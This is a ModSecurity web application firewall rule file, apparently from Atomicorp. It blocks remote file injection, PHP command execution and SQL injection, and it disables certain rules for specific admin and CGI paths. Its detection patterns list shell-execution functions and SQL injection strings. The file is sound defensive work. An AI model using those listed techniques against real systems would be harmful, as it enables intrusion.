SecRule ARGS|!ARGS:s|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/userfield/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340521,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forum/register.ph)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:s|!ARGS:/page/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/userfield/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340522,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/forum/register.ph)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91098

SecRule REQUEST_FILENAME "/manager/index\.php" "phase:2,id:91099,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340855,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156"
SecAction "phase:2,id:91100,t:none,pass,nolog,skipAfter:END_RULES_91100"

SecRule REQUEST_URI|ARGS|!ARGS:post "< ?\?" "t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,chain,id:360128,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote PHP command exection',deny,log,auditlog,status:403,phase:2"
SecRule REQUEST_URI|ARGS|!ARGS:/^layout/ "(?:(?:chr|fwrite|fopen|system|echr|passthru|serialize|include|php_uname|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo|preg_\w+) ?(?:\(|@|\: ?'?)|system\( ?getenv ?\( ?http_php ?\) ?\))"

SecRule ARGS|!ARGS:/prefix/|!ARGS:/text/|!ARGS:description|!ARGS:suitability|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/website/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:ta|!ARGS:post|!ARGS:/video/|!ARGS:/^tv/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340523,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/manager/index.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/text/|!ARGS:/prefix/|!ARGS:description|!ARGS:suitability|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/website/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:ta|!ARGS:post|!ARGS:/video/|!ARGS:/^tv/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340524,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/manager/index.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:post|!ARGS:filecontent|!ARGS:/gen_header/|!ARGS:/template/|!ARGS:newcontent|!ARGS:/description/|!ARGS:/text/|!ARGS:/txt/ "include ?\(" "capture,id:350855,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Include File Injection attempt in argument',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/.*\)"


SecRule ARGS|!ARGS:post|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/description/|!ARGS:/text/|!ARGS:Db_submit|!ARGS:/table/|!ARGS:EXPORTTABLE|!ARGS:message|!ARGS:previous_field|ARGS_NAMES|REQUEST_FILENAME|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:X-PageView|!ARGS_NAMES:/varchar/|!ARGS_NAMES:cfg_xsp_password|!ARGS:/body/|!ARGS:runQuery|!ARGS:field_type[]|!ARGS:/^field_type/|!ARGS:/^fieldtype_/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/subject/ "@pmFromFile sql.txt" "capture,id:350160,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,multimatch,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"

SecRule ARGS|XML:/*|!ARGS:post|!ARGS:data|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/descr/|!ARGS:/body/|!ARGS:/text/|!ARGS:fck_tw_body|!ARGS:sub|!ARGS:msg_body|!ARGS:saved_data|!ARGS:fck_body|!ARGS:text|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:message|!ARGS:content  "(?:(\w+)(?:user|and)(\w+)char\([0-9]+\)|\b(?:execute|convert)\(|; ?delete.*;(?:insert|declare|varchar)|and .* \( ?select |(?:drop|create)(\w+)table|(?:declare|convert) .* varchar\(|null ?, ?(?:null ?, ?(?:null|accesslevel|user_name)) ?,|concat\(|union select |union all select|\b\W*?cast\b\W*?\(.* as |xecresultset|' ?; ?declare\b\W*?|; ?set @|select (?:load_file|char\()|(?:insert|remark)test;)" "capture,id:350159,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:replaceComments,t:lowercase,t:compressWhiteSpace,rev:28,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (MM)',logdata:'%{TX.0}',multiMatch,deny,log,auditlog,status:403,phase:2"

SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:elements|!ARGS:post|!ARGS:keywords|!ARGS:/sql/|!ARGS:prefix|!ARGS:data|!ARGS:description|!ARGS:alternate1|!ARGS:comment|!ARGS:body|!ARGS:fulldescr|!ARGS:article_content|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/text/|!ARGS:txt|!ARGS:action|!ARGS:Db_submit|!ARGS:saved_data|!ARGS:form[pagina_text]|!ARGS:description|!ARGS:message|!ARGS:steps|!ARGS:fck_body  "(?:(\w+)(?:user|and)(\w+)char\([0-9]+\)|(?:execute|convert)\(|; ?delete.*;(?:insert|declare|varchar)|and .* \(select |(?:drop|create)(\w+)table|(?:declare|convert) .* varchar\(|null ?, ?(?:null ?, ?(?:null|accesslevel|user_name)) ?,|concat\(|union select |union all select|\b\W*?cast\b\W*?\(.* as|xecresultset|' ?; ?declare\b\W*?|; ?set @|select (?:load_file|char\()|(?:insert|remark)test;)" "capture,id:350157,t:none,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,rev:32,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"


SecMarker END_RULES_91100

SecRule REQUEST_FILENAME "/cgi-bin/class/class_add\.pl" "phase:2,id:91101,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91102,t:none,pass,nolog,skipAfter:END_RULES_91102"

SecRule ARGS|!ARGS:description|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340525,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/class/class_add.pl)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:description|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340526,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/class/class_add.pl)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91102

SecRule REQUEST_FILENAME "/insert_image" "phase:2,id:91103,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91104,t:none,pass,nolog,skipAfter:END_RULES_91104"

SecRule ARGS|!ARGS:DirName "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340527,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/insert_image)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:DirName "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340528,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/insert_uimage)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91104

SecRule REQUEST_FILENAME "/administration/news\.php" "phase:2,id:91105,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91106,t:none,pass,nolog,skipAfter:END_RULES_91106"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:body2|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340529,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS ( /administration/news.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:body2|!ARGS:/page/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340530,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/administration/news.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91106

SecRule REQUEST_FILENAME "/admin/editor\.php" "phase:2,id:91107,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91108,t:none,pass,nolog,skipAfter:END_RULES_91108"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:/^Dialog/|!ARGS:/textarea/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340531,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/editor.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:/^Dialog/|!ARGS:/textarea/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340532,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/editor.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91108

SecRule REQUEST_FILENAME "/cgi-sys/formmail\.cgi" "phase:2,id:91109,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91110,t:none,pass,nolog,skipAfter:END_RULES_91110"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Recommendations|!ARGS:Comments|!ARGS:background|!ARGS:redirect|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340533,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Recommendations|!ARGS:Comments|!ARGS:background|!ARGS:redirect|!ARGS:/site/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340544,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-sys/FormMail.cgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91110

SecRule REQUEST_FILENAME "/frame\.aspx" "phase:2,id:91111,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91112,t:none,pass,nolog,skipAfter:END_RULES_91112"

SecRule ARGS|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340545,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/frame.aspx)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:u "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340546,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/frame.aspx)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91112

SecRule REQUEST_FILENAME "/spaw/gethref\.php" "phase:2,id:91113,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91114,t:none,pass,nolog,skipAfter:END_RULES_91114"

SecRule ARGS|!ARGS:img "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340547,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/spaw/gethref.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:img "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340548,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/spaw/gethref.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91114

SecRule REQUEST_FILENAME "/cgi-bin/mt/mt\.fcgi" "phase:2,id:91115,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91116,t:none,pass,nolog,skipAfter:END_RULES_91116"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/text/|!ARGS:/description/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340549,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/mt/mt.fcgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/text/|!ARGS:/description/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340550,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/mt/mt.fcgi)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91116

SecRule REQUEST_FILENAME "/modules/google_cse/google_cse\.js" "phase:2,id:91117,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371"

SecRule REQUEST_FILENAME "/runmodule\.php" "phase:2,id:91118,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91119,t:none,pass,nolog,skipAfter:END_RULES_91119"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^item_number/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340551,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/runmodule.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^item_number/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340552,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/runmodule.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91119

SecRule REQUEST_FILENAME "/admin/frame\.php" "phase:2,id:91120,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91121,t:none,pass,nolog,skipAfter:END_RULES_91121"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pagina "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340553,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/frame.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^item_number/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340554,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/frame.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91121

SecRule REQUEST_FILENAME "/videos/install" "phase:2,id:91122,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91123,t:none,pass,nolog,skipAfter:END_RULES_91123"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:sitefolder "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340555,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/videos/install)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:sitefolder "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340556,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/videos/install)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91123

SecRule REQUEST_FILENAME "/support/staff/index\.php" "phase:2,id:91124,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91125,t:none,pass,nolog,skipAfter:END_RULES_91125"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/contents/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340557,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/support/staff/index.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/contents/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340558,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/support/staff/index.php)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91125

SecRule REQUEST_FILENAME "/cgi-bin/procform\.pl" "phase:2,id:91126,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91127,t:none,pass,nolog,skipAfter:END_RULES_91127"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:banner|!ARGS:backlink|!ARGS:Requests/Comments "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "id:340559,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/procform.pl)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"

SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:banner|!ARGS:backlink|!ARGS:Requests/Comments "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340560,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/cgi-bin/procform.pl)',deny,log,auditlog,status:403,phase:2"
SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"


SecMarker END_RULES_91127

